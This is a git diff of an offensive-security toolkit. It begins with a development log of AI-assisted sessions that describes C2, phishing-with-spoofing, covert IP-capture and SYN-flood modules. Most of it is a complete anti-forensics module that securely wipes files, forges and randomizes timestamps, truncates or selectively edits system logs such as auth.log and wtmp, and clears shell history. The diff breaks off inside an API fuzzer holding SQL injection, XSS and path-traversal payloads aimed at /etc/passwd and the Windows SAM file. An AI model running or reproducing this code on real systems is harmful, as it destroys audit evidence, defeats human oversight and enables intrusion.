failed to respond +to multiple messages for extended periods (45+ min of nothing). User had to +repeatedly prompt. Claude also failed to acknowledge/respond to ~5 user messages +that came in while it was "processing". Do NOT repeat this behavior. + +--- + +## Session 14 — 2026-02-28: MSF Web Runner, Agent Hal, Debug Console, LLM Settings Sub-Page + +### Phase 4.12 — MSF Web Module Execution + Agent Hal + Global AI Chat + +Wired Metasploit, the autonomous agent, and LLM chat into the web UI with live SSE streaming. + +- **core/agent.py** — added `step_callback` param to `Agent.run()` for incremental SSE step streaming +- **web/routes/offense.py** — `POST /offense/module/run` streams MSF module output via SSE; `POST /offense/module/stop` +- **web/templates/offense.html** — Run Module tabs (SSH version/brute, TCP/SYN port scan, SMB OS detect, Custom) with live output + Stop; Agent Hal panel with SSE step stream +- **web/routes/msf.py** (NEW) — MSF RPC console at `/msf/` (connect, status, console/send) +- **web/templates/msf.html** (NEW) — dark terminal MSF console (status bar, terminal div, quick commands) +- **web/routes/chat.py** (NEW) — `/api/chat` SSE token stream, `/api/agent/run|stream|stop` background agent +- **web/templates/base.html** — global HAL chat panel (fixed bottom-right, 360×480), MSF Console sidebar link +- **web/static/js/app.js** — `halToggle/Send/Append/Scroll/Clear()`, full debug console JS +- **web/app.py** — registered msf_bp + chat_bp +- **web/static/css/style.css** — HAL panel + debug panel CSS + stream utility classes (.err/.success/.info/.warn/.dim) + +### Phase 4.13 — Debug Console + +Floating debug popup capturing all Python logging output, available on every page. + +- `_DebugBufferHandler` captures root logger records into `collections.deque(maxlen=2000)` +- 4 server routes: toggle (enable/disable), stream (SSE), clear, test +- 5 client filter modes: Warnings & Errors | Full Verbose | Full Debug + Symbols | Output Only | Show Everything +- Draggable panel, level-colored output, pulsing live dot, localStorage persistence + +### Phase 4.14 — WebUSB "Already In Use" Fix + +- `adbDisconnect()` now releases USB interface (`await usbDev.close()`) +- `adbConnect()` detects Windows "already in use" errors, auto-retries once, shows "run adb kill-server" message + +### Phase 4.15 — LLM Settings Sub-Page + +Moved all LLM config to a dedicated sub-page at `/settings/llm`. + +- 4 tabs: **Local** (llama.cpp GGUF + SafeTensors/Transformers), **Claude**, **OpenAI**, **HuggingFace** +- Local tab: folder browser → scan for model files → full parameter set (llama.cpp OR transformers depending on SafeTensors checkbox) +- HuggingFace tab: token login + verify, model ID, 8 provider options, custom endpoint, full generation params +- Added OpenAI backend support (`get_openai_settings()` in config.py) +- `POST /settings/llm/scan-models` → scans folder for .gguf/.ggml/.bin files and safetensors model directories + +### Todos Added + +- **System Tray** (pystray + PIL): icon in system tray with Server Menu (server options, default folder locations for tools/models, MSF RPC options — create/connect to msfrpcd) +- **Beta Release**: create `release/` folder, build EXE (PyInstaller) and MSI installer + +--- + +## Session 15 — 2026-03-01: Hash Toolkit, Bugfixes + +### Phase 4.16 — Hash Toolkit Sub-Page + +Full Hash Toolkit added as a sub-page under Analyze (sidebar sub-item like Legendary Creator under Simulate). + +- **43 hash pattern regexes** — pure Python hashid-style identification (no external deps) +- **6 tabs:** Identify (algorithm detection + threat intel links), File Hash (5 digests), Text Hash (all algorithms), Mutate (change file hash by appending bytes), Generate (create dummy files for testing), Reference (hash type table with hashcat modes) +- **Threat intel integration:** one-click lookups to VirusTotal, Hybrid Analysis, MalwareBazaar, AlienVault OTX, Shodan +- Routes added to existing `analyze_bp` — no new blueprint needed + +### Bugfixes + +- **`modules/analyze.py`** — wrapped `import magic` in try/except to prevent module load failure when python-magic not installed +- **Debug console** — `_initDebug()` now re-enables backend capture on page load (POST to `/settings/debug/toggle`) to survive server restarts +- **Android Protection Direct mode** — `apDirect()` was passing `HWDirect.adbShell()` result objects (dicts) into `raw` instead of extracting `.stdout` strings; Python `/parse` route then crashed calling `.strip()` on dicts. Fixed by extracting stdout before sending to server +- **`_serial()` hardened** — now checks `request.form` fallback and wraps in `str()` before `.strip()` + +--- + +## Session 16 — 2026-03-01: Threat Monitor, Hal Agent, Windows Defense, LLM Trainer + +### What got done this session: +- **7-tab Threat Monitor** — expanded from 4 tabs to 7 with Network Intel, Packet Capture, DDoS Mitigation +- **Drill-down popups** — click any stat in Live Monitor for detailed modal views +- **Hal Agent Mode** — Chat bubble now uses Agent system with `create_module` tool; can create modules on demand +- **System prompt** — `data/hal_system_prompt.txt` teaches Hal the codebase +- **Windows Defense** — `modules/defender_windows.py` + `defense_windows.html` (firewall, UAC, Defender AV, services, SSH, NTFS, event logs) +- **LLM Trainer** — `modules/llm_trainer.py` + `web/routes/llm_trainer.py` + `llm_trainer.html` (dataset management, training, adapters) +- **Refresh Modules** — sidebar button for hot-reloading modules without server restart + +### Todos from session 14 resolved: +- System Tray → deferred to session 17 +- Beta Release → deferred to session 17 + +--- + +## Session 17 — 2026-03-02: System Tray, Packaging, v1.5 Release + +### What got done this session: +- **System tray** — `core/tray.py` with `TrayManager` (pystray + PIL): Start/Stop/Restart/Open Dashboard/Exit +- **Dual executables** — `autarch.exe` (CLI, console) + `autarch_web.exe` (Web, no console, tray icon) +- **PyInstaller frozen build fixes** — dual-directory pattern in `core/paths.py` (_BUNDLE_DIR vs _APP_DIR), module loading scans both bundled and user dirs +- **Installer scripts** — `installer.iss` (Inno Setup) + `installer.nsi` (NSIS) +- **Inno Setup OOM fix** — 3.9GB model stored uncompressed, `SolidCompression=no` +- **Inline critical CSS** — prevents white flash / FOUC on page load +- **All 27+ pages tested** — verified inline CSS, external stylesheet, layout structure +- **Version bumped to 1.5** +- **GitHub Release v1.5** — https://github.com/DigijEth/autarch/releases/tag/v1.5 + - `AUTARCH_Setup.exe` (34 MB) — installer without model + - `AUTARCH_v1.5_Portable.zip` (39 MB) — portable without model + +### SESSION SAVE — 2026-03-02 (end of session) + +**Phase status:** +- Phases 0–4.24: DONE +- Phase 5 (Path portability): DONE (frozen build support complete) +- Phase 6 (Docker): NOT STARTED + +**Key files created/modified this session:** +- `core/tray.py` (NEW) — TrayManager +- `autarch_web.py` (NEW) — Windowless web launcher +- `installer.iss` (NEW) — Inno Setup installer script +- `installer.nsi` (NEW) — NSIS installer script +- `core/paths.py` — Frozen build dual-directory pattern +- `core/menu.py` — Dual module directory scanning +- `web/app.py` — Frozen template/static path resolution +- `autarch.py` — --no-tray flag +- `autarch_public.spec` — Dual-exe MERGE/COLLECT +- `setup_msi.py` — Dual executables, v1.5 +- `web/templates/base.html` — Inline critical CSS + +**Todos from session 14 RESOLVED:** +- System Tray: DONE (core/tray.py) +- Beta Release: DONE (v1.5 on GitHub) + +**Remaining work from master_plan.md:** +- Phase 6 (Docker): NOT STARTED +- Plan file (quizzical-toasting-mccarthy.md) — Threat Monitor + Hal Module Factory: DONE + +--- + +## Session 18 - 2026-03-02: Chat Fix, Tray Icon, v1.5.1 Release + +### Fixes +- **Hal Chat broken** — All messages went through Agent system, models can't follow structured format → `Error: '"info"'`. Fixed by adding Chat/Agent mode toggle: Chat mode streams tokens directly via `llm.chat(stream=True)`, Agent mode uses tool-using Agent system. +- **Agent infinite retry** — Models that can't produce `THOUGHT/ACTION/PARAMS` looped 20 times. Fixed: after 2 consecutive parse failures, return the raw response as a direct answer. +- **LLM missing in exe** — `llama_cpp` was in PyInstaller excludes. Removed from `autarch_public.spec` and `setup_msi.py`. +- **No exe icon** — Created `autarch.ico` from `icon.svg`, wired into PyInstaller spec, Inno Setup installer, and `core/tray.py`. + +### New Features +- Chat/Agent toggle switch in Hal panel header (CSS slider, defaults to Chat mode) +- `autarch.ico` multi-resolution icon (16-256px) for exe, tray, installer shortcuts +- `icon.svg` source artwork (anarchy-A cyberpunk neon) + +### Release +- **v1.5.1** pushed to GitHub: https://github.com/DigijEth/autarch/releases/tag/v1.5.1 +- Assets: `AUTARCH_Setup.exe`, `AUTARCH_v1.5.1_Portable.zip` (51 MB) + +### Key files modified +- `web/routes/chat.py` — Dual-mode: `_handle_direct_chat()` + `_handle_agent_chat()` +- `core/agent.py` — `parse_failures` counter, graceful fallback after 2 failures +- `core/tray.py` — `_get_icon_path()`, loads `.ico` with fallback +- `autarch_public.spec` — Icon paths, removed llama_cpp from excludes +- `web/templates/base.html` — Hal mode toggle switch +- `web/static/js/app.js` — `halAgentMode`, `halModeChanged()`, mode in POST body +- `web/static/css/style.css` — Toggle switch styles +- `installer.iss` — Icon paths, v1.5.1 +- `autarch.ico`, `icon.svg` (NEW) + +**Phase status:** Phases 0–4.28 DONE, Phase 6 (Docker) NOT STARTED + +--- + +## Session 19 - 2026-03-03: Arsenal Expansion — Phase 5 (11 New Modules) + +Massive toolkit expansion across two back-to-back sessions. Added 11 new modules covering DNS, OSINT, phishing, load testing, exploitation, analysis, and C2 infrastructure. + +### New Modules — Phase 1 (Infrastructure) + +- **Go DNS/Nameserver Service** (`services/dns-server/`, `core/dns_service.py`) — Standalone Go binary with UDP/TCP DNS server, full zone management, record CRUD (A/AAAA/MX/TXT/CNAME/NS/SRV/PTR), DNSSEC signing, upstream recursive resolution. Python singleton wraps via HTTP REST API. Web UI: zone editor, record manager, DNSSEC toggle, metrics. +- **IP Capture Redirect** (`modules/ipcapture.py`) — Stealthy link tracking for OSINT. Fast 302 redirects with realistic disguised URLs. Captures IP, User-Agent, Accept-Language, Referer, timezone. GeoIP lookup. Dossier integration. Unauthenticated capture endpoints for stealth. +- **Gone Fishing Mail Service** (`modules/phishmail.py`) — SMTP phishing platform for authorized pentests. HTML template editor, attachment support, sender spoofing, DKIM signing, self-signed TLS certs, campaign tracking. Auto-creates MX/SPF/DKIM/DMARC via DNS service. +- **SYN Flood / Load Testing** (`modules/loadtest.py`) — Network stress testing with SYN/HTTP/UDP/Slowloris modes. Configurable threads, duration, packet size. Real-time stats via SSE. + +### New Modules — Phase 2 (Toolkit) + +- **Hack Hijack** (`modules/hack_hijack.py`, ~580 lines) — Scans for already-compromised systems. 25+ backdoor signatures: EternalBlue/DoublePulsar (SMB Trans2 probe), RATs (Meterpreter, Cobalt Strike, njRAT, DarkComet, Quasar, AsyncRAT, Gh0st, Poison Ivy), web shells (20+ paths), proxies, miners. Interactive shell sessions. +- **Password Toolkit** (`modules/password_toolkit.py`, ~480 lines) — 22 hash type signatures with auto-identification. Hashcat/John integration with Python fallback. Pattern-based password generator (`?u`/`?l`/`?d`/`?s`/`?a`). Entropy auditing. Credential spray (SSH/FTP/SMB). +- **Web App Scanner** (`modules/webapp_scanner.py`, ~500 lines) — Directory bruteforce, subdomain enum (crt.sh + DNS brute), tech fingerprinting (17 signatures), security header analysis (10 checks), SSL/TLS audit, SQLi/XSS detection, site crawler. +- **Reporting Engine** (`modules/report_engine.py`, ~380 lines) — Structured pentest report builder. 10 finding templates with CVSS scores (OWASP-aligned). Export: HTML (styled), Markdown, JSON. Severity summary dashboard. +- **Network Topology Mapper** (`modules/net_mapper.py`, ~400 lines) — Host discovery (nmap/ping sweep, 100 threads), service enumeration, OS fingerprinting. SVG topology visualization. Scan persistence with diff comparison. +- **C2 Framework** (`modules/c2_framework.py`, ~500 lines) — Multi-listener TCP C2 server. Python/Bash/PowerShell agent templates with beacon interval + jitter. Task queue: exec, download, upload, sysinfo. Agent dashboard with auto-refresh, interactive shell, payload generator. + +### Wiring + +- All 11 modules got the full triple: `modules/X.py` + `web/routes/X.py` + `web/templates/X.html` +- All blueprints registered in `web/app.py` (now 30 blueprints total) +- Sidebar links added to `base.html` under appropriate categories +- Build configs updated: `autarch_public.spec` + `setup_msi.py` (12 new hidden imports each) +- Config section `[dns]` added to `autarch_settings.conf` + +### Key files modified +- `web/app.py` — 30 blueprint imports + registrations +- `web/templates/base.html` — Sidebar: 12 new sub-items across Defense/Offense/Analyze/OSINT/System +- `autarch_public.spec` — 12 new hidden imports +- `setup_msi.py` — 12 new includes +- `autarch_settings.conf` — `[dns]` section + +### New file count +- 11 module files (`modules/`) +- 11 route files (`web/routes/`) +- 11 template files (`web/templates/`) +- 1 core service (`core/dns_service.py`) +- ~10 Go source files (`services/dns-server/`) +- **Total: ~44 new files, ~5,000+ lines of new code** + +### Module count +- **Before:** ~26 modules, 16 blueprints, 16 templates +- **After:** ~37 modules, 30 blueprints, 27 templates + +### Remaining Phase 2 modules (from plan) +- WiFi Auditing, Threat Intel Feed, Steganography, API Fuzzer, BLE Scanner, Forensics Toolkit +- Lower priority: RFID/NFC, Cloud Security, Malware Sandbox, Log Correlator, Anti-Forensics + +**Phase status:** Phases 0–5.10 DONE, Phase 6 (Docker) NOT STARTED + diff --git a/modules/anti_forensics.py b/modules/anti_forensics.py new file mode 100644 index 0000000..e2aee4b --- /dev/null +++ b/modules/anti_forensics.py @@ -0,0 +1,580 @@ +"""AUTARCH Anti-Forensics + +Secure file deletion, timestamp manipulation, log clearing, metadata scrubbing, +and counter-forensics techniques for operational security. +""" + +DESCRIPTION = "Anti-forensics & counter-investigation tools" +AUTHOR = "darkHal" +VERSION = "1.0" +CATEGORY = "counter" + +import os +import re +import json +import time +import struct +import shutil +import secrets +import subprocess +from pathlib import Path +from datetime import datetime, timezone +from typing import Dict, List, Optional, Any + +try: + from core.paths import find_tool, get_data_dir +except ImportError: + def find_tool(name): + return shutil.which(name) + def get_data_dir(): + return str(Path(__file__).parent.parent / 'data') + +try: + from PIL import Image as PILImage + HAS_PIL = True +except ImportError: + HAS_PIL = False + + +# ── Secure Deletion ───────────────────────────────────────────────────────── + +class SecureDelete: + """Secure file/directory deletion with overwrite patterns.""" + + PATTERNS = { + 'zeros': b'\x00', + 'ones': b'\xFF', + 'random': None, # Generated per-pass + 'dod_3pass': [b'\x00', None, b'\xFF'], # DoD 5220.22-M simplified + 'gutmann': None, # 35 passes with specific patterns + } + + @staticmethod + def secure_delete_file(filepath: str, passes: int = 3, + method: str = 'random') -> Dict: + """Securely delete a file by overwriting before unlinking.""" + if not os.path.exists(filepath): + return {'ok': False, 'error': 'File not found'} + + try: + file_size = os.path.getsize(filepath) + + if method == 'dod_3pass': + patterns = [b'\x00', None, b'\xFF'] + else: + patterns = [None] * passes # All random + + # Overwrite passes + for i, pattern in enumerate(patterns): + with open(filepath, 'r+b') as f: + remaining = file_size + while remaining > 0: + chunk_size = min(4096, remaining) + if pattern is None: + chunk = secrets.token_bytes(chunk_size) + else: + chunk = pattern * chunk_size + f.write(chunk[:chunk_size]) + remaining -= chunk_size + f.flush() + os.fsync(f.fileno()) + + # Truncate to zero + with open(filepath, 'w') as f: + pass + + # Rename to random name before deletion (anti-filename recovery) + directory = os.path.dirname(filepath) + random_name = os.path.join(directory, secrets.token_hex(16)) + os.rename(filepath, random_name) + os.unlink(random_name) + + return { + 'ok': True, + 'file': filepath, + 'size': file_size, + 'passes': len(patterns), + 'method': method, + 'message': f'Securely deleted {filepath} ({file_size} bytes, {len(patterns)} passes)' + } + + except PermissionError: + return {'ok': False, 'error': 'Permission denied'} + except Exception as e: + return {'ok': False, 'error': str(e)} + + @staticmethod + def secure_delete_directory(dirpath: str, passes: int = 3) -> Dict: + """Recursively securely delete all files in a directory.""" + if not os.path.isdir(dirpath): + return {'ok': False, 'error': 'Directory not found'} + + deleted = 0 + errors = 0 + + for root, dirs, files in os.walk(dirpath, topdown=False): + for name in files: + filepath = os.path.join(root, name) + result = SecureDelete.secure_delete_file(filepath, passes) + if result['ok']: + deleted += 1 + else: + errors += 1 + + for name in dirs: + try: + os.rmdir(os.path.join(root, name)) + except OSError: + errors += 1 + + try: + os.rmdir(dirpath) + except OSError: + errors += 1 + + return { + 'ok': True, + 'directory': dirpath, + 'files_deleted': deleted, + 'errors': errors + } + + @staticmethod + def wipe_free_space(mount_point: str, passes: int = 1) -> Dict: + """Fill free space with random data then delete (anti-carving).""" + try: + temp_file = os.path.join(mount_point, f'.wipe_{secrets.token_hex(8)}') + chunk_size = 1024 * 1024 # 1MB + written = 0 + + with open(temp_file, 'wb') as f: + try: + while True: + f.write(secrets.token_bytes(chunk_size)) + written += chunk_size + f.flush() + except (OSError, IOError): + pass # Disk full — expected + + os.unlink(temp_file) + + return { + 'ok': True, + 'mount_point': mount_point, + 'wiped_bytes': written, + 'wiped_mb': round(written / (1024*1024), 1) + } + + except Exception as e: + # Clean up temp file + if os.path.exists(temp_file): + os.unlink(temp_file) + return {'ok': False, 'error': str(e)} + + +# ── Timestamp Manipulation ─────────────────────────────────────────────────── + +class TimestampManip: + """File timestamp modification for counter-forensics.""" + + @staticmethod + def get_timestamps(filepath: str) -> Dict: + """Get file timestamps.""" + if not os.path.exists(filepath): + return {'ok': False, 'error': 'File not found'} + + stat = os.stat(filepath) + return { + 'ok': True, + 'file': filepath, + 'accessed': datetime.fromtimestamp(stat.st_atime, timezone.utc).isoformat(), + 'modified': datetime.fromtimestamp(stat.st_mtime, timezone.utc).isoformat(), + 'created': datetime.fromtimestamp(stat.st_ctime, timezone.utc).isoformat(), + 'atime': stat.st_atime, + 'mtime': stat.st_mtime, + 'ctime': stat.st_ctime + } + + @staticmethod + def set_timestamps(filepath: str, accessed: float = None, + modified: float = None) -> Dict: + """Set file access and modification timestamps.""" + if not os.path.exists(filepath): + return {'ok': False, 'error': 'File not found'} + + try: + stat = os.stat(filepath) + atime = accessed if accessed is not None else stat.st_atime + mtime = modified if modified is not None else stat.st_mtime + os.utime(filepath, (atime, mtime)) + + return { + 'ok': True, + 'file': filepath, + 'accessed': datetime.fromtimestamp(atime, timezone.utc).isoformat(), + 'modified': datetime.fromtimestamp(mtime, timezone.utc).isoformat() + } + except Exception as e: + return {'ok': False, 'error': str(e)} + + @staticmethod + def clone_timestamps(source: str, target: str) -> Dict: + """Copy timestamps from one file to another.""" + if not os.path.exists(source): + return {'ok': False, 'error': 'Source file not found'} + if not os.path.exists(target): + return {'ok': False, 'error': 'Target file not found'} + + try: + stat = os.stat(source) + os.utime(target, (stat.st_atime, stat.st_mtime)) + return { + 'ok': True, + 'source': source, + 'target': target, + 'message': 'Timestamps cloned' + } + except Exception as e: + return {'ok': False, 'error': str(e)} + + @staticmethod + def randomize_timestamps(filepath: str, start_epoch: float = None, + end_epoch: float = None) -> Dict: + """Set random timestamps within a range.""" + if not os.path.exists(filepath): + return {'ok': False, 'error': 'File not found'} + + if start_epoch is None: + start_epoch = time.time() - 365 * 24 * 3600 # 1 year ago + if end_epoch is None: + end_epoch = time.time() + + import random + atime = random.uniform(start_epoch, end_epoch) + mtime = random.uniform(start_epoch, end_epoch) + + return TimestampManip.set_timestamps(filepath, atime, mtime) + + +# ── Log Clearing ───────────────────────────────────────────────────────────── + +class LogCleaner: + """System log manipulation and clearing.""" + + COMMON_LOG_PATHS = [ + '/var/log/auth.log', '/var/log/syslog', '/var/log/messages', + '/var/log/kern.log', '/var/log/daemon.log', '/var/log/secure', + '/var/log/wtmp', '/var/log/btmp', '/var/log/lastlog', + '/var/log/faillog', '/var/log/apache2/access.log', + '/var/log/apache2/error.log', '/var/log/nginx/access.log', + '/var/log/nginx/error.log', '/var/log/mysql/error.log', + ] + + @staticmethod + def list_logs() -> List[Dict]: + """List available log files.""" + logs = [] + for path in LogCleaner.COMMON_LOG_PATHS: + if os.path.exists(path): + try: + stat = os.stat(path) + logs.append({ + 'path': path, + 'size': stat.st_size, + 'modified': datetime.fromtimestamp(stat.st_mtime, timezone.utc).isoformat(), + 'writable': os.access(path, os.W_OK) + }) + except OSError: + pass + return logs + + @staticmethod + def clear_log(filepath: str) -> Dict: + """Clear a log file (truncate to zero).""" + if not os.path.exists(filepath): + return {'ok': False, 'error': 'File not found'} + try: + original_size = os.path.getsize(filepath) + with open(filepath, 'w') as f: + pass + return { + 'ok': True, + 'file': filepath, + 'cleared_bytes': original_size + } + except PermissionError: + return {'ok': False, 'error': 'Permission denied (need root?)'} + except Exception as e: + return {'ok': False, 'error': str(e)} + + @staticmethod + def remove_entries(filepath: str, pattern: str) -> Dict: + """Remove specific entries matching a pattern from log file.""" + if not os.path.exists(filepath): + return {'ok': False, 'error': 'File not found'} + + try: + with open(filepath, 'r', errors='ignore') as f: + lines = f.readlines() + + original_count = len(lines) + filtered = [l for l in lines if not re.search(pattern, l, re.I)] + removed = original_count - len(filtered) + + with open(filepath, 'w') as f: + f.writelines(filtered) + + return { + 'ok': True, + 'file': filepath, + 'original_lines': original_count, + 'removed': removed, + 'remaining': len(filtered) + } + except PermissionError: + return {'ok': False, 'error': 'Permission denied'} + except Exception as e: + return {'ok': False, 'error': str(e)} + + @staticmethod + def clear_bash_history() -> Dict: + """Clear bash history.""" + results = [] + history_files = [ + os.path.expanduser('~/.bash_history'), + os.path.expanduser('~/.zsh_history'), + os.path.expanduser('~/.python_history'), + ] + for hf in history_files: + if os.path.exists(hf): + try: + size = os.path.getsize(hf) + with open(hf, 'w') as f: + pass + results.append({'file': hf, 'cleared': size}) + except Exception: + pass + + # Also clear in-memory history + try: + subprocess.run(['history', '-c'], shell=True, capture_output=True) + except Exception: + pass + + return {'ok': True, 'cleared': results} + + +# ── Metadata Scrubbing ─────────────────────────────────────────────────────── + +class MetadataScrubber: + """Remove identifying metadata from files.""" + + @staticmethod + def scrub_image(filepath: str, output: str = None) -> Dict: + """Remove EXIF data from image.""" + if not HAS_PIL: + return {'ok': False, 'error': 'Pillow not installed'} + + try: + img = PILImage.open(filepath) + # Create clean copy without EXIF + clean = PILImage.new(img.mode, img.size) + clean.putdata(list(img.getdata())) + + out_path = output or filepath + clean.save(out_path) + + return { + 'ok': True, + 'file': out_path, + 'message': 'EXIF data removed' + } + except Exception as e: + return {'ok': False, 'error': str(e)} + + @staticmethod + def scrub_pdf_metadata(filepath: str) -> Dict: + """Remove metadata from PDF (basic — rewrites info dict).""" + try: + with open(filepath, 'rb') as f: + data = f.read() + + # Remove common metadata keys + for key in [b'/Author', b'/Creator', b'/Producer', + b'/Title', b'/Subject', b'/Keywords']: + # Simple regex replacement of metadata values + pattern = key + rb'\s*\([^)]*\)' + data = re.sub(pattern, key + b' ()', data) + + with open(filepath, 'wb') as f: + f.write(data) + + return {'ok': True, 'file': filepath, 'message': 'PDF metadata scrubbed'} + except Exception as e: + return {'ok': False, 'error': str(e)} + + +# ── Anti-Forensics Manager ────────────────────────────────────────────────── + +class AntiForensicsManager: + """Unified interface for anti-forensics operations.""" + + def __init__(self): + self.data_dir = os.path.join(get_data_dir(), 'anti_forensics') + os.makedirs(self.data_dir, exist_ok=True) + self.delete = SecureDelete() + self.timestamps = TimestampManip() + self.logs = LogCleaner() + self.scrubber = MetadataScrubber() + self.audit_log: List[Dict] = [] + + def _log_action(self, action: str, target: str, details: str = ''): + """Internal audit log (ironic for anti-forensics).""" + self.audit_log.append({ + 'timestamp': datetime.now(timezone.utc).isoformat(), + 'action': action, + 'target': target, + 'details': details + }) + + def get_capabilities(self) -> Dict: + """Check available capabilities.""" + return { + 'secure_delete': True, + 'timestamp_manip': True, + 'log_clearing': True, + 'metadata_scrub_image': HAS_PIL, + 'metadata_scrub_pdf': True, + 'free_space_wipe': True, + } + + +# ── Singleton ──────────────────────────────────────────────────────────────── + +_instance = None + +def get_anti_forensics() -> AntiForensicsManager: + global _instance + if _instance is None: + _instance = AntiForensicsManager() + return _instance + + +# ── CLI Interface ──────────────────────────────────────────────────────────── + +def run(): + """CLI entry point for Anti-Forensics module.""" + mgr = get_anti_forensics() + + while True: + print(f"\n{'='*60}") + print(f" Anti-Forensics Toolkit") + print(f"{'='*60}") + print() + print(" 1 — Secure Delete File") + print(" 2 — Secure Delete Directory") + print(" 3 — Wipe Free Space") + print(" 4 — View File Timestamps") + print(" 5 — Set Timestamps") + print(" 6 — Clone Timestamps") + print(" 7 — Randomize Timestamps") + print(" 8 — List System Logs") + print(" 9 — Clear Log File") + print(" 10 — Remove Log Entries (pattern)") + print(" 11 — Clear Shell History") + print(" 12 — Scrub Image Metadata") + print(" 13 — Scrub PDF Metadata") + print(" 0 — Back") + print() + + choice = input(" > ").strip() + + if choice == '0': + break + elif choice == '1': + path = input(" File path: ").strip() + passes = input(" Overwrite passes (default 3): ").strip() + if path: + result = mgr.delete.secure_delete_file(path, int(passes) if passes.isdigit() else 3) + print(f" {result.get('message', result.get('error'))}") + elif choice == '2': + path = input(" Directory path: ").strip() + if path: + confirm = input(f" DELETE ALL in {path}? (yes/no): ").strip() + if confirm == 'yes': + result = mgr.delete.secure_delete_directory(path) + print(f" Deleted {result.get('files_deleted', 0)} files, {result.get('errors', 0)} errors") + elif choice == '3': + mount = input(" Mount point: ").strip() + if mount: + result = mgr.delete.wipe_free_space(mount) + if result['ok']: + print(f" Wiped {result['wiped_mb']} MB of free space") + else: + print(f" Error: {result['error']}") + elif choice == '4': + path = input(" File path: ").strip() + if path: + result = mgr.timestamps.get_timestamps(path) + if result['ok']: + print(f" Accessed: {result['accessed']}") + print(f" Modified: {result['modified']}") + print(f" Created: {result['created']}") + elif choice == '5': + path = input(" File path: ").strip() + date_str = input(" Date (YYYY-MM-DD HH:MM:SS): ").strip() + if path and date_str: + try: + ts = datetime.strptime(date_str, '%Y-%m-%d %H:%M:%S').timestamp() + result = mgr.timestamps.set_timestamps(path, ts, ts) + print(f" Timestamps set to {date_str}") + except ValueError: + print(" Invalid date format") + elif choice == '6': + source = input(" Source file: ").strip() + target = input(" Target file: ").strip() + if source and target: + result = mgr.timestamps.clone_timestamps(source, target) + print(f" {result.get('message', result.get('error'))}") + elif choice == '7': + path = input(" File path: ").strip() + if path: + result = mgr.timestamps.randomize_timestamps(path) + if result['ok']: + print(f" Set to: {result.get('modified', '?')}") + elif choice == '8': + logs = mgr.logs.list_logs() + for l in logs: + writable = 'writable' if l['writable'] else 'read-only' + print(f" {l['path']} ({l['size']} bytes) [{writable}]") + elif choice == '9': + path = input(" Log file path: ").strip() + if path: + result = mgr.logs.clear_log(path) + if result['ok']: + print(f" Cleared {result['cleared_bytes']} bytes") + else: + print(f" {result['error']}") + elif choice == '10': + path = input(" Log file path: ").strip() + pattern = input(" Pattern to remove: ").strip() + if path and pattern: + result = mgr.logs.remove_entries(path, pattern) + if result['ok']: + print(f" Removed {result['removed']} of {result['original_lines']} lines") + else: + print(f" {result['error']}") + elif choice == '11': + result = mgr.logs.clear_bash_history() + for c in result['cleared']: + print(f" Cleared {c['file']} ({c['cleared']} bytes)") + elif choice == '12': + path = input(" Image path: ").strip() + if path: + result = mgr.scrubber.scrub_image(path) + print(f" {result.get('message', result.get('error'))}") + elif choice == '13': + path = input(" PDF path: ").strip() + if path: + result = mgr.scrubber.scrub_pdf_metadata(path) + print(f" {result.get('message', result.get('error'))}") diff --git a/modules/api_fuzzer.py b/modules/api_fuzzer.py new file mode 100644 index 0000000..3a1ab43 --- /dev/null +++ b/modules/api_fuzzer.py @@ -0,0 +1,742 @@ +"""AUTARCH API Fuzzer + +Endpoint discovery, parameter fuzzing, auth testing, rate limit detection, +GraphQL introspection, and response analysis for REST/GraphQL APIs. +""" + +DESCRIPTION = "API endpoint fuzzing & vulnerability testing" +AUTHOR = "darkHal" +VERSION = "1.0" +CATEGORY = "offense" + +import os +import re +import json +import time +import copy +import threading +from pathlib import Path +from urllib.parse import urljoin, urlparse, parse_qs +from typing import Dict, List, Optional, Any, Tuple + +try: + from core.paths import get_data_dir +except ImportError: + def get_data_dir(): + return str(Path(__file__).parent.parent / 'data') + +try: + import requests + from requests.exceptions import RequestException + HAS_REQUESTS = True +except ImportError: + HAS_REQUESTS = False + + +# ── Fuzz Payloads ──────────────────────────────────────────────────────────── + +SQLI_PAYLOADS = [ + "' OR '1'='1", "\" OR \"1\"=\"1", "'; DROP TABLE--", "1; SELECT 1--", + "' UNION SELECT NULL--", "1' AND '1'='1", "admin'--", "' OR 1=1#", + "1 AND 1=1", "1' ORDER BY 1--", "') OR ('1'='1", +] + +XSS_PAYLOADS = [ + "", "'\">", + "javascript:alert(1)", "", "{{7*7}}", + "${7*7}", "<%=7*7%>", "{{constructor.constructor('return 1')()}}", +] + +TYPE_CONFUSION = [ + None, True, False, 0, -1, 2147483647, -2147483648, + 99999999999999, 0.1, -0.1, float('inf'), + "", " ", "null", "undefined", "NaN", "true", "false", + [], {}, [None], {"__proto__": {}}, + "A" * 1000, "A" * 10000, +] + +TRAVERSAL_PAYLOADS = [ + "../../../etc/passwd", "..\\..\\..\\windows\\system32\\config\\sam", + "....//....//....//etc/passwd", "%2e%2e%2f%2e%2e%2f", + "/etc/passwd%00", "..%252f..%252f", +] + +COMMON_ENDPOINTS = [ + '/api', '/api/v1', '/api/v2', '/api/v3', + '/api/users', '/api/admin', '/api/login', '/api/auth', + '/api/config', '/api/settings', '/api/debug', '/api/health', + '/api/status', '/api/info', '/api/version', '/api/docs', + '/api/swagger', '/api/graphql', '/api/internal', + '/swagger.json', '/swagger-ui', '/openapi.json', + '/api/tokens', '/api/keys', '/api/secrets', + '/api/upload', '/api/download', '/api/export', '/api/import', + '/api/search', '/api/query', '/api/execute', '/api/run', + '/graphql', '/graphiql', '/playground', + '/.well-known/openid-configuration', + '/api/password/reset', '/api/register', '/api/verify', + '/api/webhook', '/api/callback', '/api/notify', + '/actuator', '/actuator/health', '/actuator/env', + '/metrics', '/prometheus', '/_debug', '/__debug__', +] + + +# ── API Fuzzer Engine ──────────────────────────────────────────────────────── + +class APIFuzzer: + """REST & GraphQL API security testing.""" + + def __init__(self): + self.data_dir = os.path.join(get_data_dir(), 'api_fuzzer') + os.makedirs(self.data_dir, exist_ok=True) + self.session = requests.Session() if HAS_REQUESTS else None + self.results: List[Dict] = [] + self._jobs: Dict[str, Dict] = {} + + def set_auth(self, auth_type: str, value: str, header_name: str = 'Authorization'): + """Configure authentication for requests.""" + if not self.session: + return + if auth_type == 'bearer': + self.session.headers[header_name] = f'Bearer {value}' + elif auth_type == 'api_key': + self.session.headers[header_name] = value + elif auth_type == 'basic': + parts = value.split(':', 1) + if len(parts) == 2: + self.session.auth = (parts[0], parts[1]) + elif auth_type == 'cookie': + self.session.cookies.set('session', value) + elif auth_type == 'custom': + 